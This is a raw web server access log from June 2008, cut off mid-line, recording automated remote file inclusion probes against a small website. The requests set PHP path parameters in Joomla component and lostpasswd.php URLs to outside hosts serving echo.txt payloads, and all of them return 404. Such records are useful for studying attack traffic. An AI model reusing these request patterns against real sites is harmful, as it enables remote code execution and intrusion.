64.15.147.86 - - [22/Jun/2008:22:41:02 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:02 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:02 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:24 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:24 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:24 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:25 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:25 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:25 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:41 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:42 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:42 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:22:41:45 -0700] "GET /logs/access_080211.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:22:41:45 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:22:41:45 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:55 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:55 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:55 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:59 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:59 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:41:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:22:43:04 -0700] "GET /logs/access.log//phpsecurityad